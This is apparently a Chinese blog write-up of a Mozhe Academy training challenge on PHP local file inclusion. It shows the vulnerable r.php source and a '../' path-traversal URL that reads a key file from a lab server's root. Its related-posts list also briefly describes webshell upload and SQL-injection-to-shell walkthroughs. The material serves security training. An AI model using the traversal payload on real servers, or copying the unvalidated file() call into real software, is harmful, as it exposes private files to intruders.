墨者学院——PHP本地包含漏洞代码溯源

最新推荐文章于 2019-12-24 15:58:20 发布
最新推荐文章于 2019-12-24 15:58:20 发布
阅读量388 收藏
点赞数
分类专栏: 墨者学院
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43731011/article/details/101067913
版权

过关地址
启动环境,进入网址后,在html源码中找到提示

<!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 ->

<?php 
$p=($_GET["p"].".txt");
$pics=file($p);
for($i=0;$i< count($pics);$i++)
{
echo $pics[$i];
}
?>

http://219.153.49.228:43752/r.php?p=…/…/…/…/…/…/the_key_is_here
r.php是我们得到的提示,“p=”是要提交的GET参数 "…/"是返回上一级目录,因为the_key_is_here.txt这个文件在根目录上,注意不需要加 .txt这个后缀,php代码中已经给出,自动添加,输入网址即可得到key

面具下的狰狞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
spring IOC实现(墨者革离)
12-12
代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者学院-PHP本地包含漏洞代码溯源
JimWu的博客
09-04 311
PHP本地包含漏洞代码溯源 难易程度:★★ 题目类型:WEB安全 使用工具:FireFox浏览器 1.打开靶场,了解本地包含漏洞。 本地包含漏洞是在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等 2.F12或右键查看源码,发现r.php的源码。 由于参数p没有做任何校验,从而形成本地包含漏洞。 3.构造url为/...
墨者学院PHP本地包含漏洞代码溯源
liangzi321321的博客
09-03 463
打开靶场显示的是一个看似普通的网页,查看网页源码,发现有一些注释 <!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 -> <?php $p=($_GET["p"].".txt"); $pics=file($p); for($i=0;$i< count($pics);$i++) { echo $pics[$i]; ...
PHP本地包含漏洞代码溯源
qq_36933272的博客
09-04 358
查看源代码,发现r.php,而且包含key的文件在系统根目录中 根据r.php的内容,使用$_GET 变量来收集表单数据,提交p参数,值为txt的名称key_is_here 因为文件是系统根目录,所以输入http://219.153.49.228:48651/r.php?p=/the_key_is_here.txt 得到key ...
墨者学院———WebShell文件上传漏洞分析溯源
weixin_43862283的博客
12-24 306
WebShell文件上传漏洞分析溯源(第2题) 根据提示进行文件上传(ming.php) 文件仅允许上传gif、jpg、png文件,应该是前端限制,使用burp抓包,然后修改后缀名 回显上传成功,上传路径也回显 http://219.153.49.228:45396/uploads/ming.php 使用菜刀连接,一句话木马,查看key ...
墨者学院_BeesCMS系统漏洞分析溯源
cc_de_csdn的博客
08-22 939
墨者学院——BeesCMS系统漏洞分析溯源 1、打开用御剑扫描出admin/login.php登录界面 2、输入1’报错,存在注入 3、在user处构造代码直接写入shell,注意验证码是要最新的 4.菜刀连接得到KEY 大概是这么个流程,这样就得到KEY。 ...
墨者安全专家
07-04
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 v3.7.2.9
03-12
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
【MMSE检测】基于matlab V-BLAST结构MMSE检测(调制方式QPSK)【含Matlab源码 4572期】.mp4
05-27
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
微信小程序+报修系统界面
05-27
报修小程序资源是一款针对设施报修、设备维护等场景设计的移动端应用程序。该程序提供了便捷的报修申请、进度查询、服务评价等功能,旨在提高报修效率,优化用户体验,减少因设备故障造成的不便和损失。报修申请:用户发现设备故障后,可通过小程序提交报修申请,填写故障描述、设备位置等关键信息,并上传故障图片作为辅助说明。 进度查询:用户提交报修申请后,可随时通过小程序查询报修进度,包括已接收、已派单、维修中、已完成等状态。 服务评价:维修任务完成后,用户可以对维修人员的服务质量进行评价,提供宝贵的反馈意见,帮助改进服务质量。界面设计:报修小程序采用简洁明了的界面设计,确保用户能够轻松上手并快速完成操作。 安全保障:程序采用严格的数据加密和访问控制策略,确保用户信息安全和隐私保护。
软考 信息系统项目管理师 8大绩效域
05-27
包含了8大绩效域的预期目标、检查指标、重点关注以及如何对其进行巧记。
ipython-7.25.0.tar.gz
05-27
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
Redis-Tutorial.docx
05-27
本教程提供了一个简洁易懂的 Redis 开发指南,适用于初学者和有经验的开发人员。Redis 是一种高性能的开源内存数据库,常用于缓存、消息队列和实时数据处理等场景。通过本教程,你将学习到以下内容: 简介:了解 Redis 的基本概念和应用场景。 安装 Redis:详细步骤指导你在本地安装和配置 Redis。 启动 Redis 服务器:教你如何启动 Redis 服务器,并使用 Redis CLI 进行连接。 Redis 基本命令:介绍常用的 Redis 命令,包括设置、获取、删除键值对等操作。 高级数据结构:深入讲解 Redis 支持的复杂数据结构,如哈希、列表、集合和有序集合,并提供相应的操作命令。 数据持久化:解释 Redis 的两种持久化方式:RDB(快照)和 AOF(追加日志文件)。 事务:了解如何在 Redis 中使用事务执行一组命令的原子操作。 发布/订阅(Pub/Sub):介绍 Redis 的发布/订阅功能,支持消息的发布和订阅。 使用 Python 操作 Redis:展示如何使用 redis-py 库在 Python 中连接和操作 Redis,提供简单的示例代码
grpcio-1.60.1-cp312-cp312-manylinux_2_17_aarch64.whl
最新发布
05-27
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
墨者学院sqlmap Host头注入
07-28
墨者学院SQLMap是一款常用的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。而Host头注入是一种特定类型的SQL注入攻击方法,攻击者通过修改HTTP请求头中的Host字段来执行恶意的SQL查询。 使用SQLMap进行Host头注入的步骤如下: 1. 首先,确认目标网站存在Host头注入漏洞。可以通过手动尝试修改Host字段并观察响应来确认漏洞存在与否。 2. 下载并安装SQLMap工具。可以从墨者学院的官方网站或GitHub仓库获取最新版本。 3. 执行命令`sqlmap -u "目标URL" --headers="Host: 注入点"`,其中目标URL是要测试的目标网站URL,注入点是漏洞存在的Host字段位置。 4. SQLMap将自动进行漏洞检测和注入测试,并生成相关报告和结果。 请注意,Host头注入是一种非常危险的攻击方法,仅限用于合法的安全测试目的。在未经授权的情况下使用该方法进行攻击是违法的,并可能导致法律后果。在进行任何安全测试之前,请确保获得合法授权并遵守适用的法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值